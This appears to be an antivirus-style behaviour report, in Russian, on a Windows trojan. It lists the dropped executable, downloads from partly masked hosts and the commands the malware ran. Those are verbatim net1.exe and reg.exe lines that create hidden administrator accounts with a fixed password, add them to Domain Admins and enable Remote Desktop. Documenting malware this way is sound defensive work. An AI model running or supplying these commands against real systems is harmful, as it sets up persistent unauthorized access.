Техническая информация
- '%TEMP%\spvvt32.exe'
- '%TEMP%\spvvt32.exe' (загружен из сети Интернет)
- '<SYSTEM32>\net1.exe' group "domain admins" DHCP /add
- '<SYSTEM32>\net1.exe' localgroup "remote desktop users" DHCP /add
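- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s DHCP /add (вероятно, имеется в виду группа Administrators: при нормализации отчёта имя пользователя, по-видимому, было заменено на %USERNAME%; то же относится к аналогичной строке для учётной записи sysadm)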
- '<SYSTEM32>\net1.exe' user DHCP /active:yes
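- '<SYSTEM32>\reg.exe' add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0 /f (значение 0 параметра fDenyTSConnections разрешает входящие подключения к удалённому рабочему столу)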
- '<SYSTEM32>\net1.exe' user DHCP h3lp_desk
- '<SYSTEM32>\net1.exe' user DHCP /expires:never
- '<SYSTEM32>\net1.exe' user DHCP h3lp_desk /expires:never /add
- '<SYSTEM32>\net1.exe' localgroup "remote desktop users" sysadm /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s sysadm /add
- '<SYSTEM32>\net1.exe' user sysadm h3lp_desk /expires:never /add
- '<SYSTEM32>\net1.exe' group "domain admins" sysadm /add
- '<SYSTEM32>\net1.exe' user sysadm h3lp_desk
- '<SYSTEM32>\net1.exe' user sysadm /expires:never
- '<SYSTEM32>\net1.exe' user sysadm /active:yes
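- AVP.EXE (имя процесса антивируса Касперского; подзаголовок раздела в этом фрагменте не сохранился, поэтому неясно, ищет программа этот процесс или пытается его завершить)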
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\logo1[1].png
- %TEMP%\spvvt32.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\last3[1].png
- %TEMP%\draft.ini
- 'za###.sakura.ne.jp':80
- 'ca####t.client.jp':80
- za###.sakura.ne.jp/logo1.png
- ca####t.client.jp/img/last3.png
- DNS ASK za###.sakura.ne.jp
- DNS ASK ca####t.client.jp
- ClassName: 'Shell_TrayWnd' WindowName: ''